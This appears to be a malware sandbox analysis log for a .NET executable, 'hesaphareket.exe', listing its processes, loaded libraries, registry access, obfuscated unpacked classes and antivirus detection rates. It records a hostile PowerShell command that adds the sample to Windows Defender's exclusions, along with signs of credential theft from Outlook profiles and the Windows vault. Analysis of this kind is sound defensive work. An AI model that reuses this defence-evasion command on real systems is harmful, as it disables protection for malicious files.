Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyod5z2l.jkj.ps1
Source: hesaphareket.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\hesaphareket.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hesaphareket.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\hesaphareket.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\hesaphareket.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                    Source: hesaphareket.exe | ReversingLabs: Detection: 57%
                    Source: hesaphareket.exe | Virustotal: Detection: 58%
                    Source: unknown | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Process created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: vaultcli.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Section loaded: edputil.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\hesaphareket.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: hesaphareket.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: hesaphareket.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: hesaphareket.exe, InnerForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs | .Net Code: IL6FgNLqhG System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs | .Net Code: IL6FgNLqhG System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Code function: 0_2_00B5DB84 pushfd ; ret 0_2_00B5DB89
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Code function: 0_2_06D58770 pushfd ; retf 0_2_06D58771
                    Source: C:\Users\user\Desktop\hesaphareket.exe | Code function: 7_2_0638A930 push es; ret 7_2_0638A940
                    Source: hesaphareket.exe | Static PE information: section name: .text entropy: 7.528109321327333
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, DB0rNXPAoLV4WyNjdF.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Btx9rWtq5b', 'uk39cmRRUK', 'nVq9zCv56U', 'LhcEoH7eWo', 'VDbEl4vON2', 'Q1OE9ahaST', 'P8AEED9J2P', 'Th6iW7dHfFQ6X7FOrT1'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, W6NSRHll0U5bw9XC3tb.cs | High entropy of concatenated method names: 'LHTZcPLMbY', 'YT6ZzHsRVl', 'WILdoL70ZS', 'vp2dlVI7lK', 'cWLd9J2e7Z', 'zFpdEYVYkx', 'BwJdF02pI2', 'f6qd0Yo2CR', 'WgkdbJ50Ie', 'EqkdpdRWoK'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, mOIpKGlo1GpcENTKgBe.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GM5ZXgwT8a', 'fCsZffsj7E', 'g8mZ4R0GMB', 'YcIZeapJEL', 'GaCZWrRB3W', 'w5WZKryDVk', 'Q5PZHKI12j'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, U5httJGmuF5DPKTAnl.cs | High entropy of concatenated method names: 'WODpeODi3m', 'GU8pWccfKI', 'apepK3ZAWY', 'GclpHrqgKp', 'FGCpUYRnmL', 'tpIp8ovbEr', 'lcKpiIp4fD', 'buCpkHPPDM', 'hYiprDfCyQ', 'MLGpcFOgmI'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, RLmREhrq916NQ96X43.cs | High entropy of concatenated method names: 'EHQ1Sxwyti', 'Xga12LXQfU', 'U121N6YEQG', 'B8G1Qh1yH1', 'QUu1q9YoU5', 'Cde15S03Wo', 'Sfv1V00Agu', 'GIx1O5w1nW', 'VVs1DPEU4G', 'mmN17HELdn'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, lexLvIJdiNy80Kiycs.cs | High entropy of concatenated method names: 'EWWPBpBiCK', 'Hk8PydWYOm', 'mWoPG0mI62', 'NHKPJtTT9m', 'VI7PnSMCtY', 'rlMPuoBInv', 'Ya6PwSLbbs', 'zd2PIC8V70', 'b5OP1eN3UF', 'qHxPZxbwkP'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, aeCmgZzr3lXS43K00w.cs | High entropy of concatenated method names: 'xckZyDXYyE', 'DyWZG6Mvsu', 'puYZJpgQxs', 'IdEZSDsMwh', 'k3NZ29vhln', 'EKVZQy3SqN', 'FyAZqixl5F', 'dXsZa94APC', 'X2ZZCpaORR', 'fdhZYv6asd'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs | High entropy of concatenated method names: 'MtvE0N5Uva', 'dPsEbaNTHk', 'j8mEpuSoav', 'x5mEPiWnjc', 'SttEtgqnFw', 'pkCE6QwIfe', 'NhNELQ5kc4', 'MRGEjRuQWx', 'MQYE3V4rXg', 'j3mETGE6WI'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, ieSK5kStrek0doClXM.cs | High entropy of concatenated method names: 'uWQ60t4aX5', 'Kst6pS8WTS', 'RvU6tFa134', 'EQX6LjqvX2', 'WaV6jpo3wX', 'oohtUKCr8N', 'oCIt8YHeot', 'CyNtiZFkEO', 'z26tk66smp', 'jdJtrAI7BE'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, jcgak2caNw4QSExh2A.cs | High entropy of concatenated method names: 'MyLZPiu4sj', 'M0rZtTVits', 'NwlZ6wuld5', 'HyBZLTsctw', 'aOZZ1SEAQE', 'quGZjPlNBC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, p05yAfxmLTNU99P8HE.cs | High entropy of concatenated method names: 'He0tm93yN4', 'KxntAQlgIe', 'mT1PN91UAd', 'ELmPQSAsDj', 'rJcPq9XBrE', 'U4GP5VnYBe', 'Mp8PVWqfeg', 'fstPOWhkM1', 'J3CPDaUpnl', 'T9bP7rba57'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, mOLxEjDHWYc8XOHddC.cs | High entropy of concatenated method names: 'yd9LCR8u1n', 'U1cLYEpKjY', 'zAyLgVFVd2', 'RkwLBrvS1W', 'TGJLmUihiN', 'eqfLyMprRc', 'gKcLAnXMZa', 'SXdLG5KSjJ', 'B89LJ0PGoI', 'BHmLxfYVLU'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, hjyEGc4iSUQJitRU4D.cs | High entropy of concatenated method names: 'hEohGFWLcN', 'TEuhJPQGQ5', 'WWohSIhZit', 'uPkh2qFAi8', 'isjhQiZQTY', 'rpHhqXXaaK', 'JiGhVyilRt', 'tGGhOJTOYq', 'rCbh7Ulimm', 'jAphXfmpak'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, SlnkX0H8ePrsk99m6e.cs | High entropy of concatenated method names: 'NG5wTXIC85', 'FBXwvQBpDc', 'ToString', 'w4uwbey0gE', 'EZlwpqQXuY', 'Sj2wP3bmof', 'qlbwtKWbM7', 'Y1Zw6bta4Q', 'clSwLgsdHr', 'RRUwjchwIp'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, ibdPOaiOutWPyPGkXx.cs | High entropy of concatenated method names: 'OKV1nk4AnC', 'nHY1wiAMmF', 'f7o113tFhg', 'cZL1dkG9cI', 'wI01sowF27', 'S571axP4Bu', 'Dispose', 'DcdIbSkpup', 'xHeIptMuaX', 'Wa0IPHpr2o'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, hDpkvMpdbBM5WBbgWJ.cs | High entropy of concatenated method names: 'Dispose', 'hWPlryPGkX', 'EwI92jJoDR', 'zWWNV9QVqo', 'F4plcP3BnE', 'RaTlz0phgO', 'ProcessDialogKey', 'pbe9oLmREh', 'J919l6NQ96', 'O4399Lcgak'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, fXVa8kFOIcYK3XNYlr.cs | High entropy of concatenated method names: 'HqUlL5httJ', 'BuFlj5DPKT', 'qdilTNy80K', 'Vyclvsu05y', 'bP8lnHE6eS', 'S5klutrek0', 'DgqkD1NxNqBfkUtTIa', 'rmDoFBmw3a6ero2pC3', 'E9HllxmuOj', 'VP7lENrISR'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, TJDjG497EqNjuMFx6Z.cs | High entropy of concatenated method names: 'u3UgKC4yB', 'YlqBxendn', 'Tu0ybaZt0', 'US0AR1lmQ', 'WK3JQNcv9', 'nYwxcukjr', 'qSBeSl7BZjVK8weRGs', 'suxM4FpgqBCmf8p6hc', 'ISfsPv4GoKOnR7gMrQ', 'vSIIZ4ETe'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Oxe9Fwe6IFE8xU8ZF3.cs | High entropy of concatenated method names: 'aaQn7AefGP', 'YqHnfZPywl', 'JXKneBAPRi', 'MAlnWLAchr', 'mRLn2VKa0T', 'OMCnNCCo3V', 'KbxnQygTqc', 'Cfxnq8hU3l', 'FlJn5db8A1', 'LREnV8Vt6x'
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, uvYZ8UlFZYq1wXdFnMx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Lu0M1Flf3i', 'vMdMZPKKkW', 'hLjMdAaFYk', 'gtJMMRYbjp', 'fZcMsUjIKA', 'WPmMRPuJZy', 'WItMaiMF0P'
